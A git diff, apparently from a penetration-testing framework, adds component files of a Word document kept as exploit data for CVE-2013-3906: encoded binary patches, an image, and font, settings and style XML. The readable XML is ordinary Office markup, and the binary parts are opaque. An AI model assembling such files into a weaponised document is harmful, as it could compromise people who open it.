z3F3#XT=CU5BerlCcOiZVQmxFcm%z-2?2nj)*j{+zJ3o~^II`sLR(ljmF)qMrEFPzR
zM=k2~HFMCRBfr#%@Ht!`%aU&@Uf)tNQJ^r$L0ShfJUbnAUx8^_`8wL-%DpE|t)!O^
zd6{snz5!ELU0Z%Ho2jGB;ijXrImrB2EI`X(*<*QT$=&s>_s5S1FZIN%>+}h<N?Myd
zU-?$;B)mvg`V`E~r|K+YCqKogFvr^KOFaE?7%qN2tcWhSueMRRQNpkW8MQ(zpP4*Z
zAOP6BX-N~HD2IYauh%(0ijg`w>#;qREK0(6lHM_k@O%bHx%k0V6heXN#BDZ&I{cN#
zq_zSTl01KroWxXeEi`PUQ^Mn1MlzvT>fE@&9E6>!8PxGEV?2avTfco!Ng&^P)`71h
zDynX29~ttx$KwNyKAn^ZLuqX7@{rg|5=L;9F*^d4o4ilKm}jvTv>jSF@CL4-MxeC6
z;!U9bW-I^kqq`mG96K$d@iDCI42+QzYKzvqv!uXJj+3Vh4&@<zOmLM7OXo&++n3@h
zgE24F6X#98c4k5qx%g479Mp~W-xR!3N5P|>!Ai-)#N<g11w`^PvfSt(411}e&B;E)
zyf@2FMf{ETUVBW1^?<3QkEV;8k@Vu|o1(&`F#_Bm2cKXW8wM=SMuRZsZJr`LJ4VF^
z;~WmjMNr$KcdHNv{bTr{l|2D7x$r5cGIh|9DLTI=WXNzCZ8gBIu$pXRv@$~OEBd2C
z;@%q`%@aTPw@4pN_Teb)oRDOM3>JYz%<HNl32_&`aM3}f6gX@S6zEep8V)%&-_V^(
zZWbXmAVr<7QWc7E04myLJQ@=9rD}@eNtR@J%7K0godRllICD4)KFeu1IUe6M@2k=?
zH|!9c-J*;FaQljKZ_Z`5**Md<k}}tO2x-D$D<8_YozXr99;S_1qp5Mz)3FDv^P2l!
zH6n}NkrCU^A7pBdRl}zd)(1Y$IIX<bDcGQ+Ta^NOYHivXK$OZG+R;KSzcPukBmU|}
z?E}xHqojR_lpmmuu%iK438ND^|02OwB#u4K%>gkwk)pPvKu&wA2%1>0Q?G5{P@MT$
z)X0WyUi->d*<@=ZeQ0!`ClcglWz;w8W>Z+&QNyTC5XvxrzgM8wXNK9&WA(-5$~Hyg
zY7Q5@5@&}weL&t9@-z|u^#<~hNod<YrmPQlOS!LMxw;k+0Koj2vYcH!ZNNWDngR{|
zvT05nU!p5)>ceFlqLz}{*4%2Uk~{7k=NWvKWc?52imX3Yx+nPAoDC2fETr!Y4-BU#
zZmPVPSf}w-9lZ<k7Eq<J-4Cv|y>BpD%zwy)+74Y=(AFN8L%z^><Clz*R_k+6fEb9w
zM^KBfEzWs&SD6$D)Z<|DvxM-IkAGo9Z%x$;)-nYN1F>R<9l)09{G*aob!4oDL<+gX
zUG`2NNNGvH;HSd-B5=WdGLO2QXt$zN^vVXy(q<iAoPfe&x#EO$K1EfJ_EAMXWUusp
zApa2>U}6J6053ZOcJ@&zs^_*!`_|a1xw;Bk+Dsd=RpyWPEBp%)hFYASQe9q7Y^kPO
z&ja{&H5YsM8-Y2=2oA`Yc^)5G-&$1H8FM*6bgZt)`A=$IcL2$ZQJlGt9uN??Q^;v4
zk(+Xvx6D63_pT-JMj;!xaM$AIBm4GD1AqC<>mp574;0_j^UaO!o$4!0seCWA3sE$U
zDJb<LO!=T{UGKNYxav_2!TD|M@#QR@JNOM{m-E-1Wv&t#t1`!YA9T>r^zpuxTY^K#
z=_}|I0>NC4^H=&`<!I$-+zVeMJ*Hnu7LT;!s0Hywny!?#bc)}HSgnyH)0=joU~cW3
z+^;<4zc+2TY_Bao-E%*XX?x}yX>yKek#3@vLR;pi?+1+E>pDFv?k`%f<HrR|9wq+C
zlfTq;zbd*Y4W-yjPMp>!yU$+va2Qa}Gtrc%<Z7O&TF#8sAV|Hs%UPFYdU+@uD&Zho
zxaq&=X>Yb1#e*;U<}IOMfQBAOcUKrlKW<91HDaXj%;(v++9GMo+4XWfOq(4_)f297
z=hQ;zUyI}cN}Q4}>T9Q)mKrMt<xA3?q|q^HLgIL*Jd#nK)Zu9@3(h2yc`Oe?N$f2s
zjc9KeLz&RB?=x4MU`8JV$(E$aT)$k0<~t@icPrkPmaHmN`Np8H&L7h>EG`I{Syu!t
zJ_|zQ#uVi9$5Wqs8qP1}b3ZW*SMwn!u6EH^R5w*kVvms4uS;86>4*nuMqa>bQFo|E
zGF@081<SQ2L>xgpiFArR+M9uSeKmFZod_~LulFJEv0kc&q`I4i&U71lXr%5Tjvl!r
z>uTVd^C-nTF*Qa$a7Ir&fqCG5-_c9(CfBu6IM}@R+_an`R8q-X<ydMx`&H*&r|c%i
znAzSY#(T2@XBkdzy=nf4Zsx;q&|}?oW0%80S>(`rR4#VoO9YsZ@lz!>mu^<=$mZ&(
znG{!iArfMl$1ALTD_PsH;jHl*KmNSQdtWI>y4rfPHc85$pJX0#b4CsJC~gpZ$*R+r
z5_(W++mO-F!ZM^~tIZ<p!p(WX--_Fsnctx}OVH}2Q$2i;IU*G}>xfrTcN%kzydCxu
zjB?(&9>5==p_&`JC8A1m8GkscQ=3Itw-?g;8fZt)F5mv)Gr7;S<Q-8x2c?zHmn+F~
zP+5kUXl+V?<QK{Pm}3nZZ`S=95@i7Hk-~QS=N$jYMn1+#068pbeUDs!oX1>@jA2oW
z<HzGirEL?x^j&KTIgIxR>px?)<;TgGRc;4a;;jb8pxlXWmKjtbG`I2fp0x89a@$!m
zxvXi`0!Et|Y|9B|N(ssN=RqMFZmC^;ZoX%Cq5@w%vM}cg!$M8z*&m?^SBYkQtUH*8
znwRCQtQjOT-d$&5QslNAjw98!Htj`_K-z5x8cSFYAj@Orq+ioAe4IAtyT~6MuQ6>k
z(Hbos>x!ka<Kv3W+DHXzZI+sEltPT1Lm035jCZ}OWpBKQ7=gbTIpuBgT+_~83ah3{
zOvbSNp{5kyB^>Jn3th@n9wiRNdETkLPSC!RkD<7Fc5!OnRAW`03BeOR7L^aC#3}oA
zPmWb~vGH20xW3V4SGi|J_|2@_KRt$p_}_ioS2f|DBy1%uVg8K^lcY@TO;nxi9h^B#
z?47_r8z28FQ7|3?k`mOcJ2?qL-lJS%(;wPCV$qb>H6jyJA|B4$W21Y5$!95Bt$A}j
z`MBBc0316Ycs3-Mx*nNW9;m|kc>1M;qqHg@Vn(mTH(+^o$RP&)W65gmOG1KejJs@u
zm(7r!s2Sv^iqH-LIKCq~Fi#P>i-WQ`v923H&UT$*FtT|;cK2#xuc~NI_ROC#xIioL
z1w<%9*RTYIrin_BEbgL9gTkK&gHTp=bX6eYxZ!O;{OMSLGKpZJgZaL&{%XuT<jd-c
zm^K%2X3_JEg2)e_`#hSx{PtglO4c<S`wv2DqDXQp_%=rAP8xBo+%k#<fvEd<ELKZ{
zhu)0-;*e*a_O4_5RwoWC0oW;Dcq;}OJbiRH)C8#=@p|d#cDy93cUU8f5BEQdZ!YFu
zhqMHr6LC@CR{C@I@#nm_f>G;t;u*eP-;9D0j}QUYcl#^xj2s;P<=uD2{k$LvO0iR%
zIH8BKSFlh9okFA55PX`)Zh=k3T-OYV=CLeywHe|etGn`IcrK~F60Gw1c=yZNaml6g
zRwR(SiI}<SX>z{5p~-${DV|E-m^-C(fT^Ud4~FV<^xVd`_U}u4V^FyT+XLC)ALrA{
z>)xBFA1Bds6m}?n{+g%TQfy!jG}<XuTS<YKkXh}+@j(&Cs^oCeUW!Z5&ile(N@yVf
zJ0~`^yIsduaX{EQ+@Q2gD3i7~G(yE3{pkQ$oofkh&)UspqA+1dgQEQSm5Ip`acu5-
zT`sT#Lu!#MRjn+$UQ{dMwZvIsUp;OQb`a-^Mn3<1x<nLjf01dFujJr`_b|sCJPz|f
zV5vZ;!ald#;fWW4g98gW1_O@WI~pK`XS@B#vgrlNv6q|(w_*$asL@L1f!?QRmCej=
zN6S6z=?)XNdma|fMQ<990#$a1DKR=kCKvOCY8j+P+BnZDk-qd#4f}D<*D*kHvw5HK
zha!1o*XvdCmnDpyA37@yd=&fmOBjTMXM-i3f9@OqXUG2Y{D&^Gs>0s^{@(ohkKy;H
z56mt8(h9q6`1el2Ukxo_8r1*ZSGbLHTV4Kz1c9~2Z)wf9jc+TXzl<r+ei;9zlio(S
ztr-47c!>Vz=l?JL@HXIW748?HG{z6W+nU^MfZJ!HUjS!#Kj-x43F)@!?K1h7DJ9|U
z$^0ssZ=>8UZ+@XbVZtM9M}8}IZX^6XrT?-A04`zG`)>*Uw)x)!^Iy$fVAAHF=6{4~
WRRts%;Q#;(*bg7ZSw7(RxBme=gqP<4

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2013-3906/word/fontTable.xml b/data/exploits/CVE-2013-3906/word/fontTable.xml
new file mode 100755
index 0000000000..06076bd466
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/fontTable.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:font w:name="Calibri">
+<w:panose1 w:val="020F0502020204030204"/>
+<w:charset w:val="CC"/>
+<w:family w:val="swiss"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E00002FF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
+</w:font>
+<w:font w:name="Times New Roman">
+<w:panose1 w:val="02020603050405020304"/>
+<w:charset w:val="CC"/>
+<w:family w:val="roman"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+</w:font>
+<w:font w:name="Tahoma">
+<w:panose1 w:val="020B0604030504040204"/>
+<w:charset w:val="CC"/>
+<w:family w:val="swiss"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
+</w:font>
+<w:font w:name="Cambria">
+<w:panose1 w:val="02040503050406030204"/>
+<w:charset w:val="CC"/>
+<w:family w:val="roman"/>
+<w:pitch w:val="variable"/>
+<w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
+</w:font>
+</w:fonts>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/media/image1.jpeg b/data/exploits/CVE-2013-3906/word/media/image1.jpeg
new file mode 100755
index 0000000000000000000000000000000000000000..9795917505e42945951f2e961d7032cdfbaebd81
GIT binary patch
literal 19098
zcmeHN2Ut^Cl)j-?5tYzHosnW0KoNl;SP`U|0!b)>fC)jG3Ic+n=s1HS#Tg)?!q^BX
z3MxG`b!;f8qcl+*8$}RA6tT>pd*4e!0)l|M-|n}&iJUKwNAf)9+*AJZ-)n6>2UJ=E
z5Vhn9!9)`)FS&cUC!v^Tq@l3K!i#8<PSI74wOmImZVok{zJC>sgws^P=p<RwNo-o7
zn|_L&w*xM{KEOD2HN%13+!wjzD8a|kR0|ttl}=jkSVA|_n3YtMMK)zovZ-e%e&mvt
z(DJqCoct+^w3xRTxsIBB`{;#_HWaT3q%LCBcZHR?Z=ja8^jQ%vcx-es(^i&`zT&mX
zsm$A0BZ2iGN>wg{s(YZ?JJ`9*QEcoQ@BZ)5*cU*%25VgDuu*j?PvcUvacImm1WDGc
zvH6(xfQSbUz9ag$R?BEuAFuR1`S>f1Nw4`DmspHPV|xW)LnnogEh^GxCEKijH$qh8
zlR6g8wI3!b`Uxi=zaHvie1L~sJTEGmBSgj?7EF7cpMe&MZ84@mPBTrer8|BaK9KWW
z)`!dx&-yx$`*-Ydou@J+ENG0v8{W3uKyGyzpUO!~qb9Lw8Dq)4H2mHwtpb^mRQ3*;
z?KYgs+X{jHhp$vFFk^DPT$(<vxX?+mS~?z$eU(Ov3%i!&VdLVhU-H+Hj1M@-%RTZI
zsc}U`l8tASG_8<4hVqt%KWdxx4TTFvP?-63u@F$$;r@6Prj18odfhi-Vi9?m%zI1v
zw!$Qp@hVIw&JZhfn>%^~NyDGCWZnA|H*5pRcL^ZIuyTgUJNl`r4PON@-KdEd#6|y(
zGl*evJNiGMvB^XUZlx&w4vmZd5^>XKj@qQ5k4fH2Y9kejb(21&4Ob{=g|=tE_OXD*
za^v?go2H4;Pq7^hRzQs%X^CpdBSi)N<1eHJKCF-c06<vLzvHAU{e#>fSW!s}BBo9h
z)#1R3=Du-OV;B}}+J1~avw93F+p^x7ju^;<Icb6_bCD3D^0|QqA_ZR>36(UjzQ$j<
zVZj#r9w!%011Wa&8Xk5-p8GX+L!9hOz$LF94!gnBBje&I0!|jt*jwdmCm#;Qb6Q@p
z;dg1gdXUD$qfM^Hu{Se^L7PxxN=ceaBR?$o8k2|9m>(A7!fy6DNoZ6Qx=jIg^tU`8
zkF2qGqS{dr)<_zclNvXiB70M11@LkIj*A`}sB;Qs<!Aiq*~7udl}pbZG~=Poveq#3
zBY*j9b}`pJV4qp*8{$&#UF3H5zJI8zc}7D(QBz<DTch=T<b_|BE*)oY<Us$~z|NcW
z@te>eT?_~3w2{Lnd4%xc2Rzp_n%DiGIF;LX-o)?HS3f#R+X1)xTcZl9FWDsa-l-9m
zg57yL+kfb&0+#}x{bB0RnnLi~T*av=?6U6)cQ^e+sIm0u9ww?LJ7OHZ9<GpZFQxUJ
z4j4}3u3<Ee$-l$VxVZB>HBMOpCgWm9^|7OMipWR_%I>0^9@fW$G&VXP2<x^pH{63v
zI$J|8{d@-vccw08i~&N35`!ZEFIN$;M-t4{u-Qk3%(9#SLDA{)>eHNA_9*2ibe6S9
zbnc>*4xVKR{>r6D)46EVZGzxw`TVE6T!qRn`a=@d!?j+{sjV_^x7~!w<GP})`MH|F
z;N+_QO&=rm^424h%b#rAvSzWC_9z{S@LFtORv%=a)rnwepZxszTbYAuk+{JL&a5tA
zA19pDHbIyQXLZfvrHo^Cx>(e{yvjgj!CAe3M`q)C73t41_Pei8dsL8FeZi&YZ+MFn
z>|7d`h?BnTk@tQPB>~nV2Lsczfm#%>Pxn}pZC`SnUU%e$hNj}Fi*=Oat{=Pj?V{v0
zLki_1tkyw3g0cc#!{Ti@L@fkPnpBtI4F&lK!VRSf1AK&_jVoL4sa1b2T6>O2W2$vA
z6KHuz%FqjscohxiBMx1jQE^qjPlh6g*?DD2mr5$aN9=7fP!*`RbLFSsZadxAY4mHu
zz8Y9>*?qRo1NGMS&Wi;l`<QJCMH$^DQx|I=#$0U<3SUz})BEOPT0|)pBZkIXBE$=J
zna=(jbP~>@&>Y3hCbW`ef`&2-4k_`87rvodhi&Hcx>Q#bY3AH|*@vt9buW!m8?tWk
zTVdiulz2fJ%SI;?`^(aSMNgkLm{F$7$H7b^FS^DX{xa~q#=`7kML&Nx(QiV|!>k7X
zQ1Z4`w6TP_7Jt4Ic>xJlGv<*!U+!-#D2vF{Ie6#A@}jiGnbhot&Y(}`6>Xt)-%M06
z6Cs_9RUqj^oYl)*G!rH&VYVTYiX<wb(LaL0Bb^);@<^xYNhF=x5?Xu$KCxyfA+rB&
zr_xrX_;QOp7vI8t$dHp)s|QJ^IW?ih?lh{aZU@J9BvCyIJzI^N9J^KHDwl2gI5mU9
z+E(oqbZ=GthPelCG4i=h)oWHnN<7|qb=}L?hq{;zKOAkc4ZWNCs#}tMw7Yl>8pu_h
z;R^kk`nct7F8SuuSPnajJ342k9S(E%YkIw9+qb8t=qSDi2$ft9kW{%IAW9E-ps5~0
zH|xwKQ_Y)8Rzlj1U?XqjXA7a5043BsEln-w-pePl@=P83JeT!G$e2et-^8f@C%q#f
zq|7OYvhNmBsu0>uE2Ht3-=6kh)m!y7q^~`HL$&>zaw)NTrQXNXW-DF%?H3$aajdfa
zsY*84W=Hm)9ii$t?DqHhO-tTxP1AdTFGEX}c45HP`b~_Y#pKe&TTL5s%;oP)Kb6=X
z_^H35ZPGUbA7vb+Feu|F)rnNG<>^5<JA|lNp%u(&F)K2HA>$a1Ll)n}|M$I+arDXS
zp#7SRpjH9X?TymboU?ALSJ$#Er{_D*t!J|`9&KRW%~3YJmD{j+00Ukmyt=R6k{}%&
z{iH{wnDtO8w$eSvd1`vFhW*V}$T%X1>Wp(QR?a9v;dqVLo45U|3tvue@b@@Wu2+R1
zsxa3QN<%pQ@rGAw@z_Kk@a&CW=>*Ewgfp$Z5tNis2jq()kYTkt@jFhFX|KNj=F&+h
zmlkJ}LHvlome}exhuK$9hLv7pgCsihb~`C+r4c{TA#9-~Wz~g7t~u-E=g3xyxiv3$
z^_f0c(X=dJMI+eSXSDGc*8Uy49-UKuDWM>*k?Z*?%=z!R8VSc5gH&;!4Gtus3@fx3
zdx_C$;)ccRvQD<JOyj(nPqXh^gg8Bl=Oj9zU;EXu^2hGIW~$z|mtAT0Som++b#-d>
zi_MI`Mn!2S1<chPFgL{}1Hn9agVfdDH5@|Oc4n^{B$O>v@A+(wpbs*4=_&G|7Lg*i
zb50)lS#B}6T)5^Y&=GV0vCrb0ySn7@Yy79r3i4VPpSBgP(SzomTVtSVy4_$!QZ+fK
z5n0~3P;(dD-#XTeYwf+C0vuhJ9H{RMbx_6L3D|SH>pdZII|R&6)){YGto732>ZzWO
zDmhfWyGPnKM-WmE;Inr(y?d5Atu3tl@#`&NJ+nq#@cjZF(BXSv8H=O}F_gi<+w=wD
zTuPm&(vP$-Vw;1hy^+<>-0nz2+q7x_@*9kE&e_;fntNTq39262rWYQ6)J<gvxO`lZ
z^JJrw>7&mIyDvRG4{^0YW?ZG!`tYe4qB_aHQ-W2?T0<kl@Aw41@0#MEm|5$cpL@%$
zn+jW)r%69^`Qw776@CAtSe_2Q@Pv^+b(-d5>$3XF;<Dm^Dp=W_!Xnk9@uzYh1kEeo
z-WGb}a`zUWWH)8)WzTw-W{n;TTLe9^vy#44n#0M`kyO`Tkh)5n8w&&<Vk6qjiJ1#*
z?0gU4Pg=DXKtN`XKh4=(nD2DfX}yuG67$x?T<7*WRWiz3_>t!(*LV39+Wu5@xTUar
z$Hi4`DhOhyKtM)FU9GRN@Y=JpMV;GWkIQ+qK($n<kDXY-Fm&pyhk&K3IYc>ta@H-D
z^}JU(dpivMJ?&xY?8w}_yi46CXq}g>?|HR#8s$Rb#wWz^^2HhYA$6V0*>7*hzRY`^
zF$$J}dn+TFZ@?D28DN-d(>h?jBPS3DnFez-^n$GgDxI%kM_uSKnEC!hwGixe$=phR
zB=a9_h-u7GUX;H4l39Mut0E2__3$>{hQ-S7zU)PRe>kMIB?h*5r_}9uU8^fzJvC=4
zIJ2X}qWbvugEhVzdrRE|owMNVNNUQt6A)S-u&_S60!f99{)hiiVi2!ZZR&XN%E~w`
z_rcq~Z6~jFhu`aTc`{=(7(U4C{Wocxf(HvcjQ>D}F|g-vDLI@(<KI?i(yThYG+cVE
zK!GoIGi9$mR@2Uu)nfkOb&{+*#dRS{VftXJ;HrzAUD*}9sGQr|Ov~G(qsvG=Dy3;L
znOpOp8$g&!(cN6-?QP=2TrvL;XJls1Os#PaP)nm9QCd~$2Vppix}>0KX~D#%cL~8L
zvcYMe-D`Ef=iT8F1@+`RFE)Gpvz^H}DAoLKt5fBuiH{n-YF*C_Sm|~4u7df_33snt
zxZbLUzu61mbDUiSr?c&`dzNM+u-<;em=M9ewCo1~q?j&=>wesEPj+UhdjREOIrAN-
zsl#x$&wIw%OY^+k?EC&k%LOfj^dh@n+hDGF(>d=GhbwUG`Gj%>wViafHPe+2J6mw$
zqxvd0&itXRzV>=^(3XGQX^YnDJq(U;Tg;LTud95%Rih$loMYqii*R3{kg9nAPF@EE
z2HllEA(PkaWNh3D?k=KWk8_w+D=i+l&zZZ6NY>ADVH9*c8ca~GudjTUyDkEOGp4@;
zOGocod-_8xg4#J_BW209_-9e7{;=rpyv*prWlz{Qz>?^u#I_bZG|#9HW<4bJ{@!)_
zz5O?V>fqf`6svITQW<Jjqy!WH!qKGZW}MaWVJ0pg#|Sxhwq7=OcXWDAV;6Bwf1xXH
zMLD~pCFH`nfd?MXb28J$K3{*Cd`{(@gbvRxSiq7VA2+F<unqy~9!_ynp5p@Vb@139
zMjlbl{W`=dj)sR*T8}Wwp7_leHBHe;3*Gq@uub8B9X(fY%_65k+Z@{AnpqyZhwl6e
zt{KIT5Mx$Bc1x-6<m~(&r)Dc{6)!9uY+I@MF4aJ=7O_oPen)|4Yq1=yREfK0$N+-Z
zud51WAhxYD)R+>i9?Q4QZ^1_U#fWWd@(-s_{`d_-P!GbWC}ddUB)&4v92!U3n^Y3b
z+twB|&dMjxL@96`FCZ^3<BpO1T?zVGcfYW$C>3C-i*}xYZS9zH8vVn+2yJ(q_7?VF
z9&M-jvz9wzT$zLdGDdoB{4P@<`EN6rm)4m-0;`e!w<q-snYTl~^dwdt*`Y@VMc76B
z&Odxbin&@(4My>D^B>P6(NO`eQ}h+e*$=7q4_?M1xn-)SKbu3PLsJZ@7+uBf+mYPz
z&PS(yiKwX2+5&e;P<93x`bccMLlF1dLi$diMr_g<&JIS6jJQoUK8xb}j(gI89^wkY
zz<?baidXr~kd3RK9-Q*%EOOGI-#T}#z@GA=+j@0z*AZ%obwV_mhl7utZt7J-t7Bfv
zJGFA}+|h>@E(K%aA!4tSctZ<r5`4AGZ1-vy%6(Omqu|DPv&>eAZXpH3TMV|F1!jOB
zGd>Hk9byDp;?+YHIL9T5v)fb$l7{+c%Ufq8uJo=mdR@%M!@bWN;oJn_<FKmRB*D20
z*R`0xTQE1Pft&B#I6CN9ye6Q5!ydW$8z1JW4r|%oO>9pDmKtj~mkY2*M6;E)#t4&5
zZHk9rtYUODC79Am$e9G_da@3}3<<_hr2cU6<4ZRAw<Md&teeX_sp8p-fJuS)S>v0$
zkLBLNnWI8}|2WWHVM;T?Tyx-HQAzVJ>f~)SLf7MBOHk6lbvCQkH{kU+GuehV18znm
z`~CDcrvx$}(ujHI#h|k`{Gudxkm5%^RL;Q%#0T>6gDik&ZPFJPg=M>;l+Pym;IlS#
z?Vf~->tF_?x6R~d09*l_+^;Z`OOOnpZy$38Amc2LWSs-Ia5&4LH$c!uSNlv6JTSyJ
zf_jFOQ3unQj#gHaI++`S%fLA><Nzyc(bkr}hu(vY@HU?MrJOqdqZv!WbC3}(CKZ-N
z>9tO;)zZ8RlgHWEx!XGWDK=4)2L;pMV^8e3K~pMR3T`nH$YT_m55vqO{0mxCdB>hO
zfCXuO$g!t^{-AxpK6%Ww6q1MhMHt)35kaK+pHP2|P)C7L<@>`x=*K~v-k?*2JdDC8
zv-zCf&~y^|QRv5EPqhl`Bj@BTe-mV2L=onUFlU50GZaA&IgK*}wh41am@~qh`QMc@
zbE2X=;5ktY6yCcOK>no^fBBLN?;?`N73BK7fbjm#`;6f458>y|LE+sihu2S_G(%~J
z@-Gw-_}~5m-(N%N=Kd}N?|p&S@1cBz@(Id)C{0ivL8*dL3FRu3QYaUp{0Rm5{Th@D
zP}2X4B?>-I3Q7qSf2iLy5diK&*)0lykr)7NP*TJJu!cu&|ACS%3BX$Tg-Ox?T!9iQ
z1Hdd<07T`WFQL%o0Z^U*KrNJf1^C^G0PIu*AaW7_J0=4VF$Dl$B><eU0Jti{&#M4H
zQ-#-R063}xuzD&0+8WS*(*Sr3C2KkWK{Eg_{sDkDP;!3+VDn4>aGKDUP%5+l@X`iA
zLI-{p%IaD0b5NMG0Wh5dz~4}I&4thW34ohW0(GJ8dH@tcanT3hGnC`=0I-}7KnIj~
z1NhwgU!H)8HkQ_w0E58*59BoMm(Pj-c^AHf9uRs!=mDVzgdPxjK<ELX2ZSCFdO+v_
zp$CK>5PCr9f&aT6`0^BBS8iGF4S>BpfUF8i8^O0P55WpZcVUnp?n_i$6nROAiHV9!
zN=Ql~A|)*=EhQx*B`GN*FC!z1_(@WFf`Yu<1X(#bIpiV8*O70*A2}(>?{MUoi$GBd
z$O3s$%#T1s5hJRI`Emt70tq7yc^rhw;l3~;qGI9_P$d~z_<@3nP<>HR5vZ)V7^J%}
zk?`+8Oi_H&5A&BvOeT6t{<vw1!Oq`~NzGh-{*n^u?rY5jUO~I0Ww6RBs%l!=I<sca
zF<fY5Y=SdgVX@NEYL&H(gCm(jb#iuDN27Z)eAfF0Zw?6!+Y%n}^X^}Mjo!02=J&*;
zWafdCgNKfvNM~hao;;P6o0nfuSX9g|`SbFXtJkhq-ne<MrnauW;eO+Tr_Y`@x3sps
zXz%EG^S1Y0-}?_AKOuHufGEeT0n3Kir3md3fomWpiP(h^34<c4C?@{He2GcRh?1V0
zCjV%#Q)<fc-;SNXBt3Hh>9vwq&|Mj<rr}eq9>g@%vauPq>$@x)FpO{410W}gfr}@q
z2$uZ+CEUI=DuT}duGv7uilW!2Av24?aIQ)4k1%clBx=F51(1Q|-iIVDkl<d!j{`-F
z7_flvhK2wraqlDF!NU8<^C7tll)0bLgwIjKh@<x>z-x8xH5Oh^<$f3W&MblFn+x0*
W5#c;@H)MHX=%LTCSO~uWU;hDg`<SBu

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2013-3906/word/settings.xml b/data/exploits/CVE-2013-3906/word/settings.xml
new file mode 100755
index 0000000000..e28f493ffb
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/settings.xml
@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main">
+<w:zoom w:percent="100"/>
+<w:proofState w:spelling="clean" w:grammar="clean"/>
+<w:defaultTabStop w:val="708"/>
+<w:characterSpacingControl w:val="doNotCompress"/>
+<w:compat/>
+<w:rsids>
+<w:rsidRoot w:val="00D15BD0"/>
+<w:rsid w:val="00D15BD0"/>
+<w:rsid w:val="00F8254F"/>
+</w:rsids>
+<m:mathPr>
+<m:mathFont m:val="Cambria Math"/>
+<m:brkBin m:val="before"/>
+<m:brkBinSub m:val="--"/>
+<m:smallFrac m:val="off"/>
+<m:dispDef/>
+<m:lMargin m:val="0"/>
+<m:rMargin m:val="0"/>
+<m:defJc m:val="centerGroup"/>
+<m:wrapIndent m:val="1440"/>
+<m:intLim m:val="subSup"/>
+<m:naryLim m:val="undOvr"/>
+</m:mathPr>
+<w:themeFontLang w:val="en-US"/>
+<w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
+<w:shapeDefaults>
+<o:shapedefaults v:ext="edit" spidmax="1026"/>
+<o:shapelayout v:ext="edit">
+<o:idmap v:ext="edit" data="1"/>
+</o:shapelayout>
+</w:shapeDefaults>
+<w:decimalSymbol w:val=","/>
+<w:listSeparator w:val=";"/>
+</w:settings>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/styles.xml b/data/exploits/CVE-2013-3906/word/styles.xml
new file mode 100755
index 0000000000..b950e6138a
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/styles.xml
@@ -0,0 +1,220 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:docDefaults>
+<w:rPrDefault>
+<w:rPr>
+<w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+<w:sz w:val="22"/>
+<w:szCs w:val="22"/>
+<w:lang w:val="en-US" w:bidi="ar-SA"/>
+</w:rPr>
+</w:rPrDefault>
+<w:pPrDefault>
+<w:pPr>
+<w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
+</w:pPr>
+</w:pPrDefault>
+</w:docDefaults>
+<w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+<w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+<w:lsdException w:name="toc 1" w:uiPriority="39"/>
+<w:lsdException w:name="toc 2" w:uiPriority="39"/>
+<w:lsdException w:name="toc 3" w:uiPriority="39"/>
+<w:lsdException w:name="toc 4" w:uiPriority="39"/>
+<w:lsdException w:name="toc 5" w:uiPriority="39"/>
+<w:lsdException w:name="toc 6" w:uiPriority="39"/>
+<w:lsdException w:name="toc 7" w:uiPriority="39"/>
